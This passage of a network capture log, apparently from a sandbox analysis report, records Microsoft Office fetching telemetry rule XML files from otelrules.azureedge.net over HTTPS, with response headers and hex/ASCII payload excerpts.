2024-11-30 11:48:58 UTC	1370	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	49886	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:58 UTC	192	OUT	GET /rules/rule701351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:58 GMT Content-Type: text/xml Content-Length: 1407 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE687B46A" x-ms-request-id: c1f28834-d01e-0017-0cd3-41b035000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114858Z-174f7845968px8v7hC1EWR08ng00000011mg0000000076p6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:58 UTC	1407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	49887	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:59 UTC	192	OUT	GET /rules/rule702151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:00 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE156D2EE" x-ms-request-id: 581112ab-301e-0000-7391-3feecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114900Z-174f78459688l8rvhC1EWRtzr00000000e30000000000825 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:00 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	49889	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:49:00 UTC	192	OUT	GET /rules/rule702150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:00 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT ETag: "0x8DC582BEDC8193E" x-ms-request-id: fa9326b6-d01e-0066-63b5-42ea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114900Z-174f784596886s2bhC1EWR743w00000011h0000000000r74 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:00 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	49888	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:49:00 UTC	192	OUT	GET /rules/rule703001v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:00 GMT Content-Type: text/xml Content-Length: 1406 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB16F27E" x-ms-request-id: 5d2a7f3d-001e-0046-1b91-3fda4b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114900Z-174f7845968j6t2phC1EWRcfe800000011e0000000009kbb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:00 UTC	1406	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	49890	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:49:00 UTC	192	OUT	GET /rules/rule703000v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:00 GMT Content-Type: text/xml Content-Length: 1369 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE32FE1A2" x-ms-request-id: 7600cf19-d01e-007a-4135-41f38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114900Z-174f7845968j6t2phC1EWRcfe800000011g0000000007q3c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:00 UTC	1369	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	49891	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:49:00 UTC	192	OUT	GET /rules/rule700751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:00 GMT Content-Type: text/xml Content-Length: 1414 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE03B051D" x-ms-request-id: dbefca20-601e-00ab-55b4-4266f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114900Z-174f7845968qj8jrhC1EWRh41s00000011b0000000004z33 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:00 UTC	1414	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	49894	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:49:02 UTC	192	OUT	GET /rules/rule700150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:02 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE54CA33F" x-ms-request-id: 02365e0d-501e-0016-5daf-42181b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114902Z-174f7845968glpgnhC1EWR7uec00000011g0000000007t65 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:02 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	49892	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:49:02 UTC	192	OUT	GET /rules/rule700750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:02 GMT Content-Type: text/xml Content-Length: 1377 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT ETag: "0x8DC582BEAFF0125" x-ms-request-id: 49d32785-c01e-00a1-175b-3f7e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114902Z-174f7845968kvnqxhC1EWRmf3g0000000n30000000008x2u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:02 UTC	1377	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	49893	13.107.246.63	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:49:02 UTC	192	OUT	GET /rules/rule700151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:02 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0A2434F" x-ms-request-id: b5ebe77e-e01e-0051-390a-4184b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114902Z-174f7845968xlwnmhC1EWR0sv80000001150000000007waf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:02 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	49895	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:49:02 UTC	192	OUT	GET /rules/rule703451v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:02 GMT Content-Type: text/xml Content-Length: 1409 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFC438CF" x-ms-request-id: f8ee177c-a01e-003d-4591-3f98d7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114902Z-174f7845968nxc96hC1EWRspw80000001130000000007drr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:03 UTC	1409	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	49896	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:49:02 UTC	192	OUT	GET /rules/rule703450v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:03 GMT Content-Type: text/xml Content-Length: 1372 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6669CA7" x-ms-request-id: 3a535dae-901e-0067-22ec-41b5cb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114903Z-174f7845968j6t2phC1EWRcfe800000011ng00000000110d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:03 UTC	1372	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	49897	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
